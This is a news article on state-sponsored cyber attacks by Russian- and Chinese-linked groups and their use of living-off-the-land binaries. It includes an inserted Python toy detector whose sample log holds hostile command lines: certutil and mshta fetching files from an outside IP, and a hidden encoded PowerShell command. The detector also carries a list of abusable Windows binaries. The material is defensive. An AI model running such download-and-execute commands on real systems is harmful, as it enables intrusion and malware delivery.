SecurityBrief UK - Technology news for CISOs & cybersecurity decision-makers

The new way international politics could affect your life: cyber attacks

Thu, 27th Jun 2024

If your power was suddenly cut off, could it be blamed on property prices in China? Perhaps. While the original Cold War was fought using proxies, espionage, and propaganda, the new cold war takes place online. State-aligned and state-sponsored groups launch cyber attacks against enemies to steal secrets, extract ransoms, and sometimes just to sow chaos. Governments are keen to protect critical national infrastructure (CNI), such as energy and communications, not only from random hackers but from targeted politically motivated cyber attacks.

Hacking in itself has become part of a proxy war, where governments are so disconnected from the groups operating that they retain plausible deniability. While some nations use it as a way to gain a political or tactical advantage in warfare, some countries, such as China, also rely on it to advance their own economy. With political tensions showing no sign of cooling off and economies remaining unsteady, there is increased activity from a number of state-sponsored actors.

Understanding the threat landscape is no longer as simple as tracking criminal activity; we need to be more aware of movements in global politics and economics so as to better anticipate the next attack.

How governments and cyber criminals work together
The ongoing conflicts in Ukraine and Israel have global implications that extend into cyberspace. But why? Ultimately it comes down to where the groups are based and that region's interests. Most groups operate in Russia: in 2022 it was reported that 74% of ransomware revenue went to Russia-linked groups, and the majority of forums where cyber criminal business is discussed are in the Russian language.

Russia has earned this reputation for playing a major role in cyber crime because its government allows hackers to operate as long as they "play along". Groups are free to operate as long as they target adversaries and not allies. Many forums and groups will have rules that state those within the Commonwealth of Independent States (the former Soviet Union) are not to be targeted. This means that the hackers can make money safely, and the government benefits from the disruption. It's a win-win. 

These close ties mean that any geopolitical instability that impacts Russia or its allies will have a direct impact on cyber criminal activity. Our own research indicates that the price of stolen credentials for organisations in Israel has increased due to demand, and this correlates with the Russian government taking an anti-Israel stance.

How hackers operate in China
Hackers operating in China are a little different. Like their Russian counterparts, they align themselves with the strategic objectives of their government. However, Chinese hackers steal foreign intellectual property (IP) to give their own industries a competitive advantage. 

These campaigns target sectors such as telecommunications, finance, and government entities. Over the years, analysts have identified several groups known to be affiliated with the PRC, including Mustang Panda, Volt Typhoon and Gallium. These groups are less interested in disruption than in theft, particularly credential theft. They use tactics designed to remain under the radar, such as living-off-the-land binaries (LOTLB): legitimate tools already present on a system, trusted by system administrators but abused by attackers to carry out malicious activity. Because the binary itself is legitimate, defenders cannot simply block it; detection has to rest on context, such as which process launched the tool and what it was asked to do.

Gallium has used LOTLB as part of several operations while remaining undetected. The group is well known as part of Operation Soft Shell, which targets global telecoms and Microsoft Exchange servers, stealing IP from telecommunication, financial, and government entities in Southeast Asia, Europe, Africa, and the Middle East. Another group, Sandman, targets telecommunication providers in the Middle East, Western Europe, and South Asia using a novel backdoor that abuses the LuaJIT platform to deliver malware. Mustang Panda focuses on Southeast Asian governments, while Volt Typhoon targets U.S. CNI for intelligence-gathering purposes in alignment with the requirements of the PRC. Each has found a niche, and all are at least tolerated by the government.
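The two paragraphs above describe why living-off-the-land binaries are hard to catch: the tool is legitimate, so a defender has to look at the context in which it runs. The following is an added illustration, not code from the article or from any of the vendors or groups it names. It runs a few context-based checks over constructed process-creation records: a trusted Windows binary launched by a mail client, office suite or browser, a system binary handed a URL on its command line, and an encoded PowerShell command. The log format, hostnames, users, IP address and command lines are all invented for the example, and the binary and parent lists are illustrative rather than exhaustive.

```python
"""Toy detector for living-off-the-land binary (LOTLB) abuse.

Added example: not code from the article or any vendor. It parses
constructed process-creation records (the pipe-separated format,
hosts, users and command lines are all invented) and flags the
contexts in which a trusted Windows binary is most often misused.
"""
from dataclasses import dataclass
import re

# Constructed sample log: one process-creation record per line, fields
# separated by " | " (hypothetical format): host, user, parent, image, cmdline.
SAMPLE_LOG = """\
host01 | alice | explorer.exe | certutil.exe | certutil.exe -hashfile C:\\tools\\installer.msi SHA256
host01 | alice | winword.exe | certutil.exe | certutil.exe -urlcache -f http://203.0.113.10/x.txt C:\\Users\\alice\\x.txt
host02 | svc-backup | services.exe | powershell.exe | powershell.exe -File C:\\scripts\\backup.ps1
host02 | bob | outlook.exe | powershell.exe | powershell.exe -nop -w hidden -enc SQBFAFgA
host03 | carol | explorer.exe | mshta.exe | mshta.exe C:\\Program Files\\Vendor\\help.hta
host03 | carol | chrome.exe | mshta.exe | mshta.exe http://203.0.113.10/page.hta
"""


@dataclass
class ProcessEvent:
    host: str
    user: str
    parent: str
    image: str
    cmdline: str


@dataclass
class Finding:
    event: ProcessEvent
    reason: str


# Binaries that ship with Windows and are trusted by administrators but are
# widely documented as abused for download, execution or evasion.
# Illustrative list for this example, not exhaustive.
DUAL_USE_BINARIES = {"certutil.exe", "powershell.exe", "mshta.exe",
                     "regsvr32.exe", "rundll32.exe", "bitsadmin.exe", "wmic.exe"}

# Parents from which an admin tool should almost never be spawned on a
# workstation: office suites, mail clients and browsers (illustrative).
USER_FACING_PARENTS = {"winword.exe", "excel.exe", "outlook.exe",
                       "chrome.exe", "msedge.exe", "firefox.exe"}

URL_RE = re.compile(r"https?://", re.IGNORECASE)
ENCODED_PS_RE = re.compile(r"\s-(enc|encodedcommand)\s", re.IGNORECASE)


def parse_log(text: str) -> list[ProcessEvent]:
    """Parse the constructed pipe-separated records into ProcessEvent objects."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        host, user, parent, image, cmdline = [f.strip() for f in line.split(" | ", 4)]
        events.append(ProcessEvent(host, user, parent.lower(), image.lower(), cmdline))
    return events


def evaluate(ev: ProcessEvent) -> list[str]:
    """Return the reasons (possibly none) this event looks like LOTLB abuse."""
    reasons: list[str] = []
    if ev.image not in DUAL_USE_BINARIES:
        return reasons
    if ev.parent in USER_FACING_PARENTS:
        reasons.append(f"{ev.image} spawned by user-facing app {ev.parent}")
    if URL_RE.search(ev.cmdline):
        reasons.append(f"{ev.image} given a URL on the command line")
    if ev.image == "powershell.exe" and ENCODED_PS_RE.search(ev.cmdline):
        reasons.append("encoded PowerShell command")
    return reasons


def detect(text: str) -> list[Finding]:
    """Run every event in the log through evaluate() and collect findings."""
    findings = []
    for ev in parse_log(text):
        for reason in evaluate(ev):
            findings.append(Finding(ev, reason))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"[{f.event.host}] {f.event.user}: {f.reason}")
```

The routine admin uses in the sample (hashing an installer, a scheduled backup script, a vendor help file launched from the desktop) produce no findings, while the same three binaries launched from Word, Outlook and Chrome, or handed a URL or an encoded command, each produce two. In a real deployment the parent-process and URL checks would be tuned against a baseline of what each host and user normally runs, since the point of these tools being "legitimate" is that blocking them outright is rarely an option.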

Cyber espionage and you
Many of us are privileged that our day-to-day existence is unaffected by world politics. There are effects, but they're not always obviously linked—energy prices are higher, interest rates change, industries have to adapt to new tariffs, and so on. Nation-state-sponsored and affiliated cyber crime changes this.

Most obvious is the risk of disruption. CNI is targeted because disrupting everyday life is an effective way to apply pressure. If people do not have reliable access to electricity for long periods, or hospitals are unable to provide care due to cyber attacks, this can very easily have a destabilising effect on a government.

The less disruptive tactic of theft will also mean targeting ordinary people. While movies often depict hackers typing rapidly to "defeat firewalls", the reality is that people are often the weakest link in any cybersecurity setup, falling victim to phishing emails and similar attacks. Ransomware or more insidious attacks could be a group trying to make money—or it could be a state-affiliated group looking to steal secrets from an employer.

When auditing the risk of cyber attack, businesses need to consider not just how they could be exploited for ransomware but whether they could fall victim to a more politically motivated attack. The different motives in play mean that a business doesn't have to be of national importance to be at risk.
